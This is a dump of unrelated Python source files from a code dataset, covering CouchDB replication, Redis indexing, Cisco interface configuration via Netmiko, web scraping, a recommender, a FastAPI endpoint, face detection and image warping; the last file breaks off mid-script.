#log.info(\"Destination node '{}' require authentication\".format(destinationUrl))\n #Try to get the user name and password the url.\n credential = sourceLRNode.getDistributeCredentialFor(destinationUrl)\n if credential is not None:\n parsedUrl = urlparse.urlparse(destinationUrl)\n destinationUrl = destinationUrl.replace(parsedUrl.netloc, \"{0}:{1}@{2}\".format(\n credential['username'], credential['password'], parsedUrl.netloc))\n \n log.info(\"\\n\\nReplication started\\nSource:{0}\\nDestionation:{1}\\nArgs:{2}\".format(\n sourceUrl, destinationUrl, str(replicationOptions)))\n\n if replicationOptions['query_params'] is None: \n del replicationOptions['query_params']\n results = server.replicate(sourceUrl, destinationUrl, **replicationOptions)\n log.debug(\"Replication results: \"+str(results))\n with lock:\n server = couchdb.Server(appConfig['couchdb.url'])\n db = server[appConfig['couchdb.db.node']]\n doc = db[appConfig['lr.nodestatus.docid']]\n doc['last_out_sync'] = h.nowToISO8601Zformat()\n doc['out_sync_node'] = destinationNode.nodeDescription.node_name\n db[appConfig['lr.nodestatus.docid']] = doc\n \n log.info(\"Distribute.......\\n\")\n ##Check if the distribte service is available on the node.\n #if(sourceLRNode.isServiceAvailable(NodeServiceModel.DISTRIBUTE) == False):\n #log.info(\"Distribute not available on node \")\n #return\n if((sourceLRNode.connections is None) or \n (len(sourceLRNode.connections) ==0)):\n log.info(\"No connection present for distribution\")\n return\n log.info(\"Connections: \"+str(sourceLRNode.connections)+\"\\n\")\n lock = threading.Lock()\n for connectionInfo in self._getDistributeDestinations():\n replicationArgs = (connectionInfo['destinationNode'], \n defaultCouchServer, \n self.resource_data, \n connectionInfo[\"distribute_sink_url\"],lock)\n \n # Use a thread to do the actual replication.\n replicationThread = threading.Thread(target=doDistribution, \n args=replicationArgs)\n replicationThread.start()\n\n","sub_path":"LR/lr/controllers/distribute.py","file_name":"distribute.py","file_ext":"py","file_size_in_byte":11180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"116364081","text":"# -*- coding: utf-8 -*-\n#\n# Copyright 2010 Tobias Rodäbel\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Redis Datastore Indexes.\n\nPartitioning addresses key issues in supporting very large indexes by letting\nyou decompose them into smaller and more manageable pieces called partitions.\nAlso, partitioning should be entirely transparent to applications.\n\"\"\"\n\n\nimport uuid\n\n\n_SCORE_INDEX = '%(app)s!%(kind)s:%(prop)s:\\vSCORES'\n_PROPERTY_SCORE = '%(app)s!%(kind)s:%(prop)s:\\r%(score)s:\\vKEYS'\n_PROPERTY_VALUE = '%(key)s:%(prop)s'\n_TEMPORARY_KEY = '%(app)s!TEMP:%(uuid)s'\n\n\nclass BaseIndex(object):\n \"\"\"The base index class.\"\"\"\n\n def __init__(self, db, app, kind, prop):\n self.__db = db\n self.__app = app\n self.__kind = kind\n self.__prop = prop\n self.__key = _SCORE_INDEX % locals()\n\n @property\n def db(self):\n return self.__db\n\n @property\n def app(self):\n return self.__app\n\n @property\n def kind(self):\n return self.__kind\n\n @property\n def prop(self):\n return self.__prop\n\n @property\n def key(self):\n return self.__key\n\n def get_score(self, val):\n raise NotImplemented\n\n def _execute(self, func, key, value=None, pipe=None):\n assert func in ('sadd', 'srem')\n if value is None:\n value = self.db[key]\n if not pipe:\n _pipe = self.db.pipeline()\n else:\n _pipe = pipe\n score = self.get_score(value)\n _pipe = getattr(_pipe, func)(score, key)\n _pipe = getattr(_pipe, func)(self.key, score)\n if pipe:\n return pipe\n else:\n return _pipe.execute()\n\n def add(self, key, value=None, pipe=None):\n return self._execute('sadd', key, value, pipe)\n\n def remove(self, key, value=None, pipe=None):\n return self._execute('srem', key, value, pipe)\n\n def _partitions(self, op, score):\n keys = self.db.sort(self.key)\n if op in ('<', '<='):\n for p in reversed(filter(lambda k: k<=score, keys)): yield p\n if op in ('>', '>='):\n for p in sorted(filter(lambda k: k>=score, keys)): yield p\n\n def get_value(self, val):\n raise NotImplemented\n\n def filter(self, op, value, limit=1000, offset=0):\n \"\"\"Apply filter rules.\n\n Args:\n op: An operator.\n value: A string object.\n limit: The number of results to return.\n offset: The number of results to skip.\n \"\"\"\n score = self.get_score(value)\n results = []\n\n if op == '<':\n cond = (-1,)\n desc = True\n if op == '<=':\n cond = (-1, 0)\n desc = True\n if op == '>':\n cond = (1,)\n desc = False\n if op == '>=':\n cond = (0, 1)\n desc = False\n\n if isinstance(value, basestring):\n alpha = True\n else:\n alpha = False\n\n buf_key = _TEMPORARY_KEY % {'app': self.app, 'uuid': uuid.uuid4()}\n for p in self._partitions(op, score):\n pipe = self.db.pipeline()\n for k in self.db.sort(p):\n pipe = pipe.rpush(buf_key, k)\n pipe.execute()\n\n prop_key = \"*:\"+self.prop\n\n all_values = self.db.sort(\n buf_key, by=prop_key, get=prop_key, alpha=alpha, desc=desc)\n\n if isinstance(value, unicode):\n value = str(value.encode('utf-8'))\n if value not in all_values:\n all_values.append(value)\n all_values.sort(\n lambda a,b:cmp(unicode(a,'utf-8'), unicode(b, 'utf-8')))\n if desc:\n all_values.reverse()\n\n pos = all_values.index(value)\n\n keys = self.db.sort(\n buf_key, by=prop_key, alpha=alpha, desc=desc, start=pos+offset,\n num=limit)\n values = self.db.sort(\n buf_key, by=prop_key, get=prop_key, alpha=alpha, desc=desc,\n start=pos+offset, num=limit)\n\n self.db.delete(buf_key)\n\n buf = [(keys[i], self.get_value(values[i]))\n for i in range(len(keys))]\n\n count = 0\n\n for k, v in buf:\n if cmp(v, value.decode('utf-8')) in cond:\n results.append(k)\n count += 1\n if count >= limit:\n break\n \n return results\n\n\nclass StringIndex(BaseIndex):\n \"\"\"Indexing string values.\"\"\"\n\n def __init__(self, db, app, kind, prop, depth=2):\n super(StringIndex, self).__init__(db, app, kind, prop)\n self.__depth = depth\n\n def get_score(self, val):\n d = self.__depth\n score = ''.join([str(ord(c)).zfill(5) for c in val[:d]]).ljust(d*5,'0')\n key_info = dict(\n app=self.app, kind=self.kind, prop=self.prop, score=score)\n return _PROPERTY_SCORE % key_info\n\n def get_value(self, val):\n return val.decode('utf-8')\n","sub_path":"src/typhoonae/redis/indexes.py","file_name":"indexes.py","file_ext":"py","file_size_in_byte":5433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"247982445","text":"#!/usr/bin/env python3.6\n\nfrom netmiko import *\nimport getpass, os, platform, time, sys\nfrom termcolor import cprint\n\ndevicePlatformList = ['ios', 'xe', 'xr']\nsleepTime = 8\n\n\ndef clearScreen():\n if platform.system() == 'Windows':\n os.system('cls')\n else:\n os.system('clear')\n\n cprint('### Powered by Netmiko ###', 'green', attrs=['bold'])\n print('Note that This tool is only interface configurator.\\n')\n\n\ndef credential():\n while True:\n userName = input(\"Devices username(Your credential will not store): \")\n if userName != '':\n userPassword = getpass.getpass()\n return userName,userPassword\n else:\n print(\"Username can not be empty! try again.\\n\")\n continue\n\n\ndef platformSelection():\n while True:\n devicePlatform = input(\"Choose platform(IOS, XE, XR): \").lower()\n if devicePlatform not in devicePlatformList:\n print(\"Input correct platform!\\n\")\n continue\n else:\n return devicePlatform\n break\n\n\ndef deviceInfo():\n while True:\n deviceIP = input(\"\\ninput Mgmt address(x.x.x.x): \")\n if len(deviceIP.split('.')) == 4 or (len(deviceIP) > 15):\n return deviceIP\n break\n else:\n print(\"IP address is incorrect.\\n\")\n continue\n\n\n\ndef connection(devicePlatform, deviceIP, userName, userPassword):\n cisco_lab = {\n 'device_type': 'cisco_' + devicePlatform,\n 'ip': deviceIP,\n 'username': userName,\n 'password': userPassword,\n 'port': 22,\n 'timeout': 5,\n\n }\n\n try:\n net_connect = ConnectHandler(**cisco_lab)\n except NetMikoTimeoutException :\n cprint(\"'Connection timed out!'\", 'red', attrs=['bold'], end='')\n print(\", Please check your settings and try again!\\n\")\n appRestart()\n\n except NetMikoAuthenticationException:\n cprint(\"'Authentication Failed!'\", 'red', attrs=['bold'], end='')\n print(\", Please check your settings and try again!\\n\")\n appRestart()\n\n return net_connect\n\n\ndef showInterface(net_connect):\n showIntQ = ''\n while showIntQ not in ('n', 'y'):\n showIntQ = input('Do you want current interface list?(Y/N):').lower()\n if showIntQ == 'y':\n showInt = net_connect.send_command('show ip int br')\n print(showInt)\n\n\ndef configuration(devicePlatform, net_connect, deviceIP):\n interfaceName = ''\n while interfaceName is '':\n interfaceName = input(\"\\nInput type of Interface(e.g. gig0/0/0, tengig0/0/0/0, hungig0/0/0/0, etc.): \").lower()\n\n interfaceDescription = input(\"\\n\\nInput interface description if you prefer(hit enter to skip): \")\n\n subInterface = ''\n dot1q= ''\n while subInterface not in ('n','y'):\n subInterface = input(\"Do you want create sub-interface? (Y/N)\").lower()\n if subInterface == 'y':\n while True:\n try:\n dot1q = int(input(\"Input sub Interface value to Config({}.xx): \".format(interfaceName)))\n break\n except:\n print(\"enter in digit format!\\n\")\n elif subInterface == 'n':\n dot1q = 'N/A'\n break\n dot1q = str(dot1q)\n\n while True:\n if devicePlatform == 'xr':\n settingIP = input(\"what IP address and prefix will be set?(A.B.C.D/yy): \")\n if len(settingIP.split('.')) == 4 or (len(settingIP) > 18):\n break\n else:\n print(\"IP address is incorrect.\\n\")\n continue\n else:\n settingIP = input(\"what IP address and subnet mask will be set?(A.B.C.D W.X.Y.Z): \")\n if len(settingIP.split('.')) == 7 or (len(settingIP) > 31):\n break\n else:\n print(\"IP address is incorrect.\\n\")\n continue\n\n\n print('\\n\\nmgmt ip: \\x1B[1;31;40m{}\\x1B[0m\\nInterface: \\x1B[1;31;40m{}\\x1B[0m\\nsub interface: \\x1B[1;31;40m{}\\x1B[0m\\ndescription: \\x1B[1;31;40m{}\\x1B[0m\\ninterface IP address: \\x1B[1;31;40m{}\\x1B[0m\\n\\n'.format(deviceIP, interfaceName, dot1q, interfaceDescription, settingIP))\n\n answer = ''\n while answer not in ('n','y'):\n answer = input('Are these settings Ok?(Y/N):').lower()\n\n if answer == \"y\":\n print('\\noperation starts now ...')\n elif answer == \"n\":\n clearScreen()\n\n if dot1q == \"N/A\":\n if devicePlatform == \"xr\":\n config_commands = ['interface ' + interfaceName , 'no shut', 'ip add ' + settingIP, 'description *** ' + interfaceDescription, 'commit', 'end']\n output = net_connect.send_config_set(config_commands)\n show_ip = settingIP.split('/')\n show_ip = show_ip[0]\n time.sleep(sleepTime)\n output_ip = net_connect.send_command('show ip int br | inc ' + show_ip)\n print(output)\n if 'Up' in output_ip:\n cprint(output_ip, 'green')\n else:\n cprint(output_ip, 'red')\n net_connect.disconnect()\n\n else:\n config_commands = ['interface ' + interfaceName, 'no shut','ip add ' + settingIP, 'description *** ' + interfaceDescription, 'end', 'wr', '\\n']\n output = net_connect.send_config_set(config_commands)\n show_ip = settingIP.split(' ')\n show_ip = show_ip[0]\n time.sleep(sleepTime)\n output_ip = net_connect.send_command('show ip int br | inc ' + show_ip)\n print(output)\n if 'up' in output_ip:\n cprint(output_ip, 'green')\n else:\n cprint(output_ip, 'red')\n net_connect.disconnect()\n else:\n if devicePlatform == \"xr\":\n config_commands = ['interface ' + interfaceName , 'no shut', 'interface ' + interfaceName + '.' + dot1q, 'encap dot1q ' + dot1q, 'ip add ' + settingIP , 'description *** ' + interfaceDescription, 'commit', 'end']\n output = net_connect.send_config_set(config_commands)\n show_ip = settingIP.split('/')\n show_ip = show_ip[0]\n time.sleep(sleepTime)\n output_ip = net_connect.send_command('show ip int br | inc ' + show_ip)\n print(output)\n if 'Up' in output_ip:\n cprint(output_ip, 'green')\n else:\n cprint(output_ip, 'red')\n net_connect.disconnect()\n\n else:\n config_commands = ['interface ' + interfaceName , 'no shut', 'interface ' + interfaceName + '.' + dot1q, 'encap dot1q ' + dot1q, 'ip add ' + settingIP , 'description *** ' + interfaceDescription, 'end', 'wr', '\\n']\n output = net_connect.send_config_set(config_commands)\n show_ip = settingIP.split(' ')\n show_ip = show_ip[0]\n time.sleep(sleepTime)\n output_ip = net_connect.send_command('show ip int br | inc ' + show_ip)\n print(output)\n if 'up' in output_ip:\n cprint(output_ip, 'green')\n else:\n cprint(output_ip, 'red')\n net_connect.disconnect()\n appRestart()\n\n\ndef appRestart():\n restartApp = ''\n while restartApp not in ('n','y'):\n restartApp = input(\"Do you want restart app?(Y/N)\").lower()\n if restartApp == 'y':\n python = sys.executable\n os.execl(python, python, *sys.argv)\n elif restartApp == 'n':\n exit()\n\n\ndef main():\n clearScreen()\n username, userpassword = credential()\n deviceplatform = platformSelection()\n deviceinfo = deviceInfo()\n net_connect = connection(deviceplatform, deviceinfo, username, userpassword)\n showInterface(net_connect)\n configuration(deviceplatform, net_connect, deviceinfo)\n\n\nif __name__ == '__main__':\n main()","sub_path":"Cisco_Interface_Configurator.py","file_name":"Cisco_Interface_Configurator.py","file_ext":"py","file_size_in_byte":7814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"468087494","text":"# name : Jeremy Chauvin\n# email : jjchauvin79@gmail.com\n# date : 08 Sept 2016\n# class : CS0008-f2016\n# instructor : Max Novelli (man8@pitt.edu)\n#\n# Description: This converts square meters to acres.\n#\n# Example: Starting with Python, Chapter 2, Exercise 3\n#\n# Notes:\n#\n\n# declare varable to hold sq meters in acre\nsq_m_in_acre = float(4046.8564224)\n\n# get user input of total square meters and assign to varable\ntotal_sq_m = float(input('Enter The amont of square meters to be converted to Acres ---->'))\n\n# perform calculation to convert square meters to acers\ncalculated_acers = (total_sq_ft / sq_m_in_acre )\n\n# output total acers to user\nprint(\"Your total acer's are = \", calculated_acers )\n\n","sub_path":"ch2/Ch2-Ex3/ch2-ex3.py","file_name":"ch2-ex3.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"498199583","text":"#!/usr/bin/env python3\r\n\"\"\"\r\nAuthor : donaldscoon\r\nDate : 2019-02-19\r\nPurpose: Skim a bunch of poems\r\n\"\"\"\r\n\r\nimport re\r\nimport os\r\nimport argparse\r\nimport sys\r\n\r\n\r\n# --------------------------------------------------\r\ndef get_args():\r\n \"\"\"get command-line arguments\"\"\"\r\n parser = argparse.ArgumentParser(\r\n description='Argparse Python script',\r\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\r\n\r\n parser.add_argument(\r\n '-w',\r\n '--int',\r\n help='Number of characters per line?',\r\n metavar='int',\r\n type=int,\r\n default=50)\r\n\r\n parser.add_argument(\r\n 'directory', metavar='DIR', help='Chosen directory', nargs='+')\r\n\r\n return parser.parse_args()\r\n\r\n\r\n# --------------------------------------------------\r\ndef warn(msg):\r\n \"\"\"Print a message to STDERR\"\"\"\r\n print(msg, file=sys.stderr)\r\n\r\n\r\n# --------------------------------------------------\r\ndef die(msg='Something bad happened'):\r\n \"\"\"warn() and exit with error\"\"\"\r\n warn(msg)\r\n sys.exit(1)\r\n\r\n#### Perhaps a function to reuse my head program?\r\n\r\n# --------------------------------------------------\r\ndef main():\r\n \"\"\"TOoT toOT tOOt TooT\r\n tots jazz noises\r\n that trombone. \"\"\"\r\n\r\n args = get_args()\r\n width = args.int\r\n# dots = '.'*int\r\n #### Error message for not a directory\r\n for dirname in args.directory:\r\n if not os.path.isdir(dirname):\r\n warn('\"{}\" is not a directory'.format(dirname))\r\n continue\r\n\r\n d = {}\r\n# d[line] = file\r\n#sorted(d.items)\r\n print(dirname)\r\n #### creating variables\r\n for file in os.listdir(dirname):\r\n path = os.path.join(dirname, file)\r\n line = open(path).readline().rstrip()\r\n d[line] = file\r\n\r\n for line, file in sorted(d.items()):\r\n linew = len(line)\r\n filew = len(file)\r\n dots = '.'*(width - linew - filew)\r\n\r\n print('{} {} {}'.format(line, dots, file))\r\n####Maybe did it wrong, again\r\n\"\"\" for key in d:\r\n keyw = len(key)\r\n filew = len(file)\r\n dots = '.'*(width - keyw - filew)\r\n \r\n print('{}{}{}'.format(key, dots, file))\r\n\r\n\"\"\"\r\n\r\n\r\n\r\n\r\n #### HOARD ALL THE CODE\r\n\"\"\" for file in os.listdir(dirname):\r\n filelocation = dirname + '/' + file\r\n with open(filelocation) as poem:\r\n for line in poem:\r\n\r\n d = {'line': (line), 'ellipse': (dots), 'file': (path)}\r\n print(d.get('line'),end='')\r\n print(d.get('ellipse'))\r\n print(d.get('file'))\r\n #print('{} {}'.format(d.get('line'), (d.get('ellipse'))\r\n\"\"\"\r\n\r\n #### old code I am hoarding just in case\r\n\"\"\" for file in os.listdir(dirname):\r\n print('.'*int + ' {}'.format(file))\r\n filelocation = dirname + '/' + file\r\n with open(filelocation) as poem:\r\n for line in poem:\r\n #print('{} {} {}'.format(line, dots, file), end='')\r\n print('{} '.format(line) + ' {} '.format(dots) + ' {}'.format(dots), end='')\r\n\"\"\"\r\n\r\n\r\n# --------------------------------------------------\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"assignments/06-python-first-lines/first_lines.py","file_name":"first_lines.py","file_ext":"py","file_size_in_byte":3201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"589026256","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport sys\nimport operator\nimport csv\nimport string\nimport pprint\nimport random\nimport math\n\ndef splitData(data, k, M, seed):\n\ttest = []\n\ttrain = []\n\trandom.seed(seed)\n\tfor user, item in data:\n\t\tif random.randint(0, M) == k:\n\t\t\ttest.append([user, item])\n\t\telse:\n\t\t\ttrain.append([user, item])\n\n\treturn train, test\n\ndef Recall(train, test, W, N):\n\thit = 0\n\tAll = 0\n\tfor user in train.keys():\n\t\tif user not in test.keys():\n\t\t\tcontinue\n\t\ttestItems = test[user]\n\t\trank = GetRecommendation(train, user, W, N)\n\t\tfor item, pui in rank.items():\n\t\t\tif item in testItems:\n\t\t\t\thit += 1\n\t\tAll += len(testItems)\n\treturn float(\"%.5f\"%(hit / (All * 1.0)))\n\ndef Precision(train, test, W, N):\n\thit = 0\n\tAll = 0\n\tfor user in train.keys():\n\t\tif user not in test.keys():\n\t\t\tcontinue\n\t\ttestItems = test[user]\n\t\trank = GetRecommendation(train, user, W, N)\n\t\tfor item, pui in rank.items():\n\t\t\tif item in testItems:\n\t\t\t\thit += 1\n\t\tAll += N\n\n\treturn float(\"%.5f\"%(hit / (All * 1.0)))\n\ndef Popularity(train, test, W, N):\n\titem_popularity = dict()\n\tfor user, items in train.items():\n\t\tfor item in items:\n\t\t\tif item not in item_popularity:\n\t\t\t\titem_popularity[item] = 0\n\t\t\titem_popularity[item] += 1\n\t#pprint.pprint(item_popularity)\n\n\tret = 0\n\tp = 0\n\tfor user in train.keys():\n\t\trank = GetRecommendation(train, user, W, N)\n\t\tfor item, pui in rank.items():\n\t\t\tif item not in item_popularity:\n\t\t\t\tcontinue\n\t\t\tp += math.log(1 + item_popularity[item])\n\t\t\tret += 1\n\n\treturn float(\"%.5f\"%(p / ( ret * 1.0 )))\n\n# 计算平均流行度时对每个物品的流行度取对数,\n# 因为物品的流行度分布满足长尾分布,在取对数后,流行度的平均值更加稳定\n\ndef Coverage(train, test, W, N):\n\trecommend_items = set()\n\tall_items = set()\n\n\tfor user in train.keys():\n\t\tfor item in train[user]:\n\t\t\tall_items.add(item)\n\n\t\trank = GetRecommendation(train, user, W, N)\n\t\tfor item, pui in rank.items():\n\t\t\trecommend_items.add(item)\n\n\treturn float(\"%.5f\"%(len(recommend_items) / (len(all_items) * 1.0)))\n\n\n\ndef ItemSimilarity(train):\n\t# 计算共现矩阵\n\tN = {}\n\tC = {}\n\n\tfor u, items in train.items():\n\t\tfor i in items:\n\t\t\tN[i] = N.get(i, 0) + 1\n\n\t\t\tif i not in C.keys():\n\t\t\t\tC[i] = {}\n\t\t\tfor j in items:\n\t\t\t\tif i == j:\n\t\t\t\t\tcontinue\n\t\t\t\tC[i][j] = C[i].get(j, 0) + 1\n\t# 计算最终相似度\n\t# W = {}\n\t# for i, related_items in C.items():\n\t# \tif i not in W.keys():\n\t# \t\tW[i] = {}\n\t# \tfor j, cij in related_items.items():\n\t\t\t\n\t# \t\tW[i][j] = float(\"%.3f\"% (cij / math.sqrt(N[i] * N[j] * 1.0)))\n\n\t# return W\n\treturn C\n\ndef GetRecommendation(train, user, W, K):\n\trank = {}\n\ttrainItems = train[user]\n\tpi = 1.0\n\tfor i in trainItems:\n\t\tfor j , wj in sorted(W[i].items(), key = operator.itemgetter(1), reverse=True)[0:K]:\n\t\t\t#if j in trainItems:\n\t\t\t\t#continue\n\t\t\trank[j] = rank.get(j, 0) + pi * wj\n\t\t\t#rank[j].reason[i] = pi * wj\n\n\treturn rank\n\ndef GenericRecommendationList(train, W, K):\n\twith open(\"recommendation.txt\", 'w') as rec:\n\t\tfor user in train.keys():\n\t\t\trank = GetRecommendation(train, user, W, K)\n\t\t\t\n\t\t\trec.write(\"{0}\\t\".format(user))\n\t\t\ttopN = sorted(rank, key = lambda x: rank[x], reverse = True)\n\t\t\tfor item in topN:\n\t\t\t\trec.write(\"{0}:{1}\\t\".format(item, rank[item]))\n\t\t\trec.write(\"\\n\")\n\n\ndef GetInvertedList(data):\n\tret = {}\n\tfor user, item in data:\n\t\tif user not in ret.keys():\n\t\t\tret[user] = []\n\t\tif item in ret[user]:\n\t\t\tcontinue\n\t\tret[user].append(item)\n\n\treturn ret\n\ndef GetData():\n\treader = csv.reader(sys.stdin, delimiter=\"\\t\")\n\tnext(reader, None)\n\n\tdata = []\n\tfor line in reader:\n\t\tif len(line) != 2:\n\t\t\tcontinue\n\t\tuser = line[0]\n\t\titems = line[1].translate(None, string.punctuation).split()\n\t\tfor item in items:\n\t\t\tdata.append([user, item])\n\n\treturn data\n\n\ndef main():\n\tdata = GetData()\n\ttrain = GetInvertedList(data)\n\tW = ItemSimilarity(train)\n\tGenericRecommendationList(train, W, 10)\n\t\n\t# M = 8\n\t# recall = 0.0\n\t# precision = 0.0\n\t# cover = 0.0\n\t# popu = 0.0\n\t# for k in range(M):\n\t# \tseed = 1000\n\t# \ttrain, test = splitData(data, k, M, seed)\n\n\t# \t# get inverted list\n\t# \ttrain = GetInvertedList(train)\n\t# \ttest = GetInvertedList(test)\n\t# \t#pprint.pprint(train)\n\t# \t#pprint.pprint(test)\n\n\t# \tW = ItemSimilarity(train)\n\t# \t#pprint.pprint(W)\n\n\t# \ttopK = 20# 3, 5, 10, 20\n\t# \trecall += Recall(train, test, W, topK)\n\t# \tprecision += Precision(train, test, W, topK)\n\t# \tcover += Coverage(train, test, W, topK)\n\t# \tpopu += Popularity(train, test, W, topK)\n\n\t# print recall/M, precision/M, cover/M, popu/M\n\n\nif __name__ == '__main__':\n\tmain()\n\n\n\n","sub_path":"recsys/coocMatRecommend.py","file_name":"coocMatRecommend.py","file_ext":"py","file_size_in_byte":4486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"41441825","text":"\"\"\"\nPrediction Service End Point\n\"\"\"\nimport time\n\nfrom fastapi.routing import APIRouter\nfrom src.utils.logging_util import Logger\nfrom src.configurations.app_configs import AppConfigs\nfrom src.domain.request_response_schemas import (\n PredictionServiceRequest,\n PredictionServiceResponse,\n)\nfrom src.services.prediction_service import PredictionService\n\nrouter = APIRouter()\n\nLOGGER = Logger.get_instance()\nAPP_CONFIGS = AppConfigs.get_instance()\n\n\n@router.post(\n \"/predict\", tags=[\"Prediction Service\"], response_model=PredictionServiceResponse\n)\nasync def get_response(request: PredictionServiceRequest):\n \"\"\"\n This end point predicts the label for the given text and returns the result in the response.\n\n :param request: The request for the API.\n\n :return: The response with the prediction results.\n \"\"\"\n tic = time.time()\n LOGGER.logger.info(\"Request: %s\", request.json())\n prediction_service_response = PredictionService.get_response(request.text)\n LOGGER.logger.info(\n \"Total time taken to respond: %s ms.\\n\", round(1000 * (time.time() - tic), 2)\n )\n return prediction_service_response\n","sub_path":"src/routers/v1.py","file_name":"v1.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"161112800","text":"import numpy as np\nimport cv2\nimport matplotlib.image as img\nimport matplotlib.pyplot as plt\nimport datetime\nfrom os import listdir\nimport os\n\n\nforder = \"data_detection/Long_Lan_image\" # forder chứa ảnh cần xác định face\nwrong_detects = 0 # biến đếm ảnh mà mtcnn k phát hiện được face\ntotal_image = 0\narr = []\nprint(\"start time\")\nprint(datetime.datetime.now().time())\nfor filename in listdir(forder):\n total_image += 1\n path = forder + \"/\" + filename\n face_cascade = cv2.CascadeClassifier(r'haarcascade_frontalface_default.xml')\n image = plt.imread(path)\n\n faces = face_cascade.detectMultiScale(image, 1.3, 5)\n if len(faces) == 0:\n wrong_detects += 1\n arr.append(filename)\n cv2.imwrite(os.path.join(\"wrong\" , filename), image)\n\n continue\n elif len(faces) == 1:\n wrong_detects += 1\n\n for (x, y, w, h) in faces:\n cv2.rectangle(image, (x, y), (x + w, y + h), (255,0 , 0), 2)\n # cv2.imwrite(filename, image)\n cv2.imwrite(os.path.join(\"miss_1\" , filename), image)\n\n else:\n for (x, y, w, h) in faces:\n cv2.rectangle(image, (x, y), (x + w, y + h), (255,0 , 0), 2)\n # cv2.imwrite(filename, image)\n cv2.imwrite(os.path.join(\"right\" , filename), image)\nprint(\"end time\")\nprint(datetime.datetime.now().time())\nprint(arr)\nprint(\"wrong detects:\",wrong_detects)\nprint(\"total images:\", total_image)\nprint(\"accurance:\",1-wrong_detects/total_image)\n","sub_path":"haar_code.py","file_name":"haar_code.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"232197572","text":"#! /usr/bin/python3\n\nimport bs4, requests, os, pyperclip, csv\n\n#get webPage address go scrape from clipboard\n\naddress = pyperclip.paste();\n\nres = requests.get(address)\n\nres.raise_for_status()\n\n#formats web Page\npage = bs4.BeautifulSoup(res.text, \"lxml\")\npage.prettify()\ntype(page)\n\n#scrapes for restaurant page and writes to csv file\nnameArray = []\nfor span in page.find_all(\"a\", \"biz-name\"):\n page.strippedstrings\n nameArray.append(span.text)\n\n#scrapes for addresses and writes to csv file\naddressArray = []\nfor address in page.find_all(\"address\"):\n page.strippedstrings\n addressArray.append(address.text)\n\n#scrapes for phone numbers and writes to csv file\nphoneArray = []\nfor span in page.find_all(\"span\", \"biz-phone\"):\n page.strippedstrings\n phoneArray.append(span.text)\n\n#writes list to file called restaurant.csv\nf = open('restaurant.csv', 'a')\nfor i in range(len(nameArray)):\n f.write(nameArray[i] + \"\\n\")\nf.close()\n\nf = open('phone.csv', 'a')\nfor i in range(len(phoneArray)):\n f.write(phoneArray[i] + \"\\n\")\nf.close()\n\nf = open('address.csv', 'a')\nfor i in range(len(addressArray)):\n f.write(addressArray[i] + \"\\n\")\nf.close()\n","sub_path":"restaurantScrape.py","file_name":"restaurantScrape.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"159885786","text":"from django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\n\nfrom match.api import PlayerViewSet, TeamGameViewSet, OfficialGameViewSet, MatchViewSet\n\napp_name = 'match'\n\nrouter = DefaultRouter()\nrouter.register('players', PlayerViewSet)\nrouter.register('team_games', TeamGameViewSet)\nrouter.register('official_games', OfficialGameViewSet)\nrouter.register('matches', MatchViewSet)\n\n# kudos to https://www.webforefront.com/django/consolidatedjangourls.html for help\n# on url consolidation, can use include with list of url patterns\napi_urlpatterns = [\n\n]\n\napi_urlpatterns = api_urlpatterns + router.urls\n\nurlpatterns = [\n path('api/', include((api_urlpatterns, 'api'), namespace='api'))\n]","sub_path":"match/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"500972917","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Oct 16 17:00:38 2016\r\n\r\n@author: Rebecca\r\n\"\"\"\r\n\r\nfrom PIL import Image \r\nfrom pylab import *\r\nfrom numpy import *\r\n\r\nsource = []\r\ndestination = []\r\nim = array(Image.open('hillary.jpg'))\r\nnewim = zeros(im.shape)\r\nimshow(im)\r\ninpu = ginput(2)\r\n\r\n#corner points\r\nsource.append([0,0])\r\nsource.append([0,len(im[0])])\r\nsource.append([len(im),0])\r\nsource.append([len(im),len(im[0])])\r\n\r\ndestination.append([0,0])\r\ndestination.append([0,len(im[0])])\r\ndestination.append([len(im),0])\r\ndestination.append([len(im),len(im[0])])\r\n\r\n#ginput recieves coordinates as y,x\r\ninX = inpu[0][1]\r\ninY = inpu[0][0]\r\nsource.append([inX,inY])\r\n\r\ninX2 = inpu[1][1]\r\ninY2 = inpu[1][0]\r\ndestination.append([inX2,inY2])\r\n\r\n#Added by Angel\r\ndisp = subtract(source, destination)\r\n\r\nweight = []#array(im.shape)\r\nfor r in range(len(im)):\r\n for c in range(len(im[0])):\r\n distance = zeros(len(destination))\r\n for dest in range(len(destination)):\r\n distance[dest] = (sqrt(pow(r-destination[dest][0],2) + pow(c-destination[dest][1],2)))\r\n #print \" \"\r\n weight = 1/(distance + 0.0000001)\r\n weight = weight/sum(weight)\r\n newx = r + dot(weight, disp)[0]\r\n newy = c +dot(weight, disp)[1]\r\n 